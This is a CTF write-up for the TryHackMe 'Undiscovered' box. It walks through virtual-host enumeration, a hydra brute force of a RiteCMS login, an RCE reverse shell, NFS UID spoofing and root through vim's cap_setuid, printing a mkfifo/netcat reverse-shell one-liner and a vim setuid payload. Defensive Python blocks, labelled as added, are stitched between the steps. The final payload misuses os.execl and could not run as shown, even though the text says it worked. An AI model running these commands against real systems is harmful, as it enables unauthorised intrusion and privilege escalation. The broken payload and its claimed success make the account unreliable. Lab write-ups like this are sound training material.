Undiscovered Write-up THM
Hello fellow hackers, I am back with another write-up for you all so let's get started.
Today we are doing the Undiscovered box on tryhackme.com, created by ch4rm.
The topics we are going to cover are:-
- Virtual hosts enumeration
- CMS bruteforcing
- Getting a reverse shell using an exploit from exploit-db
- Mounting the victim's NFS share and accessing its data from our local machine
- Horizontal privilege escalation using a script on victim machine
- And finally privilege escalation using vim.basic capabilities
So let's get started,
Virtual Hosts Enumeration
As our general methodology goes, we'll start with an nmap scan
# Nmap 7.80 scan initiated Tue Nov 10 01:56:45 2020 as: nmap -sC -sV -oN nmapscans 10.10.122.39
Nmap scan report for undiscovered.thm (10.10.122.39)
Host is up (0.40s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:76:81:49:50:bb:6f:4f:06:15:cc:08:88:01:b8:f0 (RSA)
|   256 2b:39:d9:d9:b9:72:27:a9:32:25:dd:de:e4:01:ed:8b (ECDSA)
|_  256 2a:38:ce:ea:61:82:eb:de:c4:e0:2b:55:7f:cc:13:bc (ED25519)
80/tcp   open  http    Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100021  1,3,4      35696/tcp   nlockmgr
|   100021  1,3,4      45836/tcp6  nlockmgr
|   100021  1,3,4      51820/udp6  nlockmgr
|   100021  1,3,4      57664/udp   nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
2049/tcp open  nfs     2-4 (RPC #100003)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 10 01:57:37 2020 -- 1 IP address (1 host up) scanned in 51.62 seconds
-sC:- runs default scripts
-sV:- Checks for the service versions
-oN:- saves the scan output to a file (normal format)
Ok, so we see:
- port 22 - ssh
- port 80 - http
- port 111 - rpcbind
- port 2049 - nfs
Let's see what port 80 holds for us.
The website is just a static page and the source code didn't have anything interesting either, so let's move on.
Now, the second thing I always try when enumerating is a directory scan:
gobuster dir -u http://undiscovered.thm/ -w /Seclist/Discovery/Web-Content/directory-list-2.3-medium.txt
-u:- for specifying URL
-w:- for specifying wordlist
We didn't find anything interesting, so let's move on and try enumerating subdomains and virtual hosts.
gobuster dns -d undiscovered.thm -w /Seclist/Discovery/DNS/subdomains-top1million-110000.txt
-d:- for specifying domain string
DNS enumeration didn't give anything, but I found some good stuff from vhost enumeration:
gobuster vhost -u undiscovered.thm -w /Seclist/Discovery/DNS/subdomains-top1million-110000.txt | grep 200
The raw output is quite messy, so piping it through "grep 200" cleans it up and leaves only the hosts that answered with status code 200.
Now that we have found some let's see what contents they hold,
After testing some of the hosts that we found, I added two virtual hosts to my /etc/hosts file:-
- start.undiscovered.thm
- deliver.undiscovered.thm
start.undiscovered.thm:-
Every host was the same as the main website, except for deliver.undiscovered.thm:-
Now that we have found some lead, let's get on to enumerating this host.
Again I ran a gobuster scan on this website and found:-
CMS Bruteforcing
After finding the directories, the one that looked pretty interesting to me was /cms, so I decided to take a look at it.
It looks like we have a login page. The first thing I decided to try was logging in with the default credentials
"admin:admin", which obviously gave an error.
As you can see in the image above, the RiteCMS version is 2.2.1, so I googled around to find an exploit for this version.
I found a Remote Code Execution exploit for this particular version, but the catch is that the exploit requires authentication, i.e. we need credentials.
Here comes hydra,
Using hydra I found the credentials for admin,
hydra -l admin -P /usr/share/wordlists/rockyou.txt deliver.undiscovered.thm http-post-form "/cms/index.php:username=^USER^&userpw=^PASS^:User unknown or Password wrong"
-l :- to specify the username
-P :- to specify the wordlist we want to use
http-post-form :- tells hydra that we are attacking an HTTP form with POST requests. With this module we also need to specify the form parameters that accept the username and password, in this case username and userpw, and the string that marks a failed login, here "User unknown or Password wrong".
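From the defender's side, the brute force above leaves an obvious trace in the web server's access log, and the detail that matters is the one hydra relies on: RiteCMS answers a wrong password with a normal 200 page rather than a 401, so status codes alone won't reveal the attack. The following is an added example (my code, not from the write-up or RiteCMS) of a Python detector run over constructed Apache combined-format lines; the login path /cms/index.php comes from the write-up, while the threshold, window and sample IPs are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOGIN_PATH = "/cms/index.php"   # the form hydra was pointed at in the write-up
# Apache combined log format: ip ident user [time] "METHOD path proto" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def parse_line(line):
    """Return (ip, timestamp, method, path, status) for one log line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)

def find_bruteforce(lines, threshold=10, window_s=60):
    """Map each client IP to the largest number of POSTs to LOGIN_PATH it made inside
    any window_s-second window, keeping only clients at or above threshold. The status
    code is deliberately ignored: a failed login here is still a 200."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3].split("?")[0] == LOGIN_PATH:
            posts[rec[0]].append(rec[1])
    hits = {}
    for ip, times in posts.items():
        times.sort()
        best, start = 0, 0
        for end in range(len(times)):          # sliding window over sorted timestamps
            while times[end] - times[start] > timedelta(seconds=window_s):
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            hits[ip] = best
    return hits

def constructed_log():
    """Constructed sample (not a real capture): one host submitting the login form
    every second for 30 seconds, and one host that logs in normally once."""
    fmt = '{ip} - - [10/Nov/2020:02:10:{s:02d} +0000] "POST /cms/index.php HTTP/1.1" {st} 1905 "-" "Mozilla/5.0"'
    lines = [fmt.format(ip="10.9.1.5", s=s, st=200) for s in range(30)]
    lines.append(fmt.format(ip="10.9.1.7", s=45, st=302))
    return lines

if __name__ == "__main__":
    for ip, n in find_bruteforce(constructed_log()).items():
        print(f"{ip}: {n} login POSTs inside 60s")
```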
Now that we have a password let's exploit RiteCMS.
Getting a reverse-shell
Using the RCE exploit with the credentials we obtained,
On running a netcat listener we get a reverse shell back as the user www-data
Mounting the nfs share and accessing the data for the user william
Ok so now that we have a foothold on the machine let's enumerate and look for some privilege escalation vectors,
Looking back at our nmap scan, we saw that the machine was hosting an NFS share on port 2049. To get more details about it, we look at the /etc/exports file.
We can see the share is /home/william, so let's mount it on our machine and access its data:
sudo mount -t nfs <machine IP>:/home/william /mnt/files
We mounted the share, but when trying to access the folder I got "permission denied".
Now comes the tricky part.
After doing some research I figured out that we need to create a user william on our machine with the UID 3003 to access the /home/william share that we mounted.
Why UID 3003? Because when I accessed the /etc/passwd file on the victim machine, user william had the UID 3003.
So we created the user william and now we can access the data in the share.
To make my life easier I changed the permissions with chmod 777 on the /home/william directory so that I can access it as www-data.
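The permission-denied/UID 3003 detail is the whole security lesson of this share: with AUTH_SYS the NFS server believes whatever UID the client sends, and only the squash options in /etc/exports can override that. Below is an added example, not from the write-up, of a small Python audit of export options that shows why a local account with UID 3003 reads the share and which options would have stopped it; the box's real /etc/exports line is not quoted in the write-up, so the EXPORTS value is constructed.

```python
import re

NOBODY_UID = 65534   # Linux default for anonuid when a request is squashed

def parse_exports(text):
    """Parse /etc/exports text into [(path, client, {option: value})]. Options
    without '=' map to True; comments and blank lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for spec in clients or ["*"]:          # a path with no client means everyone
            m = re.match(r"([^(]*)(?:\((.*)\))?$", spec)
            client, opts = m.group(1) or "*", {}
            for opt in filter(None, (m.group(2) or "").split(",")):
                key, _, value = opt.partition("=")
                opts[key] = value or True
            entries.append((path, client, opts))
    return entries

def effective_uid(opts, client_uid):
    """UID the server acts as for a request that arrives claiming client_uid.
    root_squash is the default and maps only UID 0; all_squash maps everyone."""
    anon = int(opts.get("anonuid", NOBODY_UID))
    if opts.get("all_squash"):
        return anon
    if client_uid == 0 and not opts.get("no_root_squash"):
        return anon
    return client_uid

def audit(text, owner_uid):
    """Flag exports where a client can read the owner's files just by creating a
    local account with the owner's UID, the trick used against william above."""
    out = []
    for path, client, opts in parse_exports(text):
        if effective_uid(opts, owner_uid) == owner_uid:
            out.append(f"{path} ({client}): UID {owner_uid} is honoured as sent; "
                       "use all_squash or an explicit client list instead of *")
        if opts.get("no_root_squash"):
            out.append(f"{path} ({client}): no_root_squash lets a client's root act as root")
    return out

# Constructed line (the write-up does not quote the box's /etc/exports).
EXPORTS = "/home/william *(rw,sync,no_subtree_check)\n"
WILLIAM_UID = 3003   # william's UID from the victim's /etc/passwd, per the write-up

if __name__ == "__main__":
    for finding in audit(EXPORTS, WILLIAM_UID):
        print(finding)
```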
Horizontal privilege escalation using a script on victim machine
Now that we have access to william's folder, let's move on to getting access to leonard's data.
As you can see in the previous images, there was a script available to us in william's directory.
Running the script with an argument gave us output like this:
./script test
/bin/cat: /home/leonard/test: No such file or directory
So I used this script to grab leonard's ssh keys.
Now we can simply ssh into the machine as the user leonard.
Privilege escalation using vim.basic capabilities
Let's do some enumeration using linpeas,
On reading the linpeas output, I found a really interesting privesc vector that uses a capabilities vulnerability of vim.
A quick search on GTFOBins gave me the command I needed to escalate to root:
vim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
Or so I thought. Unfortunately this command didn't work, but I knew that the privesc could be done using vim, so I kept enumerating and found some interesting stuff in the /home/leonard/.viminfo file.
(Note: the .viminfo file stores command-line history, search string history, etc.)
Using this payload, I started a netcat listener on my machine and got a reverse shell:
/usr/bin/vim -c ':py import os; os.setuid(0); os.execl("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <port> >/tmp/f")'
We got Root!! This was a really fun box and taught me a lot of new stuff.
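What made vim.basic exploitable is a file capability, which lives in the security.capability extended attribute of the binary; linpeas surfaces it by running getcap. The following is an added example, not from the write-up, of a Python decoder for that attribute (struct vfs_cap_data, revisions 2 and 3) that flags root-equivalent capabilities such as cap_setuid on files that embed a scripting engine; the write-up does not quote getcap output for the box, so the sample attribute bytes are constructed to encode the cap_setuid+ep state the payload relies on.

```python
import os
import struct

# Capability numbers from <linux/capability.h> (subset; others render as cap_N).
CAP_NAMES = {0: "cap_chown", 1: "cap_dac_override", 2: "cap_dac_read_search",
             6: "cap_setgid", 7: "cap_setuid", 8: "cap_setpcap", 12: "cap_net_admin",
             13: "cap_net_raw", 19: "cap_sys_ptrace", 21: "cap_sys_admin", 31: "cap_setfcap"}
# On a binary with a built-in interpreter (vim's :py, python, perl...) these are root-equivalent.
ROOT_EQUIVALENT = {1, 2, 6, 7, 8, 19, 21, 31}

def decode_security_capability(blob):
    """Decode the security.capability xattr (struct vfs_cap_data, revision 2 or 3,
    all fields little-endian) into (permitted, inheritable, effective_flag, rootid)."""
    magic_etc = struct.unpack_from("<I", blob, 0)[0]
    revision = magic_etc >> 24
    if revision not in (2, 3):
        raise ValueError(f"unsupported vfs_cap revision {revision}")
    permitted = inheritable = 0
    for i in range(2):                       # VFS_CAP_U32 == 2 for both revisions
        p, h = struct.unpack_from("<II", blob, 4 + 8 * i)
        permitted |= p << (32 * i)
        inheritable |= h << (32 * i)
    rootid = struct.unpack_from("<I", blob, 20)[0] if revision == 3 else 0
    return permitted, inheritable, bool(magic_etc & 1), rootid   # bit 0 = VFS_CAP_FLAGS_EFFECTIVE

def cap_names(mask):
    return [CAP_NAMES.get(i, f"cap_{i}") for i in range(64) if mask >> i & 1]

def risky_caps(blob):
    """Root-equivalent capabilities that are both permitted and effective on this file."""
    permitted, _, effective, _ = decode_security_capability(blob)
    return [CAP_NAMES[i] for i in sorted(ROOT_EQUIVALENT) if effective and permitted >> i & 1]

def scan(paths):
    """Read the xattr off real files (Linux only); files without caps are skipped."""
    report = {}
    for path in paths:
        try:
            blob = os.getxattr(path, "security.capability")
        except (OSError, AttributeError):
            continue
        if risky_caps(blob):
            report[path] = cap_names(decode_security_capability(blob)[0])
    return report

# Constructed xattr value encoding cap_setuid+ep: revision 2, effective flag set,
# bit 7 (CAP_SETUID) in permitted[0]. Not captured from the box.
VIM_BASIC_XATTR = bytes.fromhex("01000002" "80000000" "00000000" "00000000" "00000000")

if __name__ == "__main__":
    print(risky_caps(VIM_BASIC_XATTR))               # ['cap_setuid']
    print(scan(["/usr/bin/vim.basic", "/usr/bin/python3"]))
```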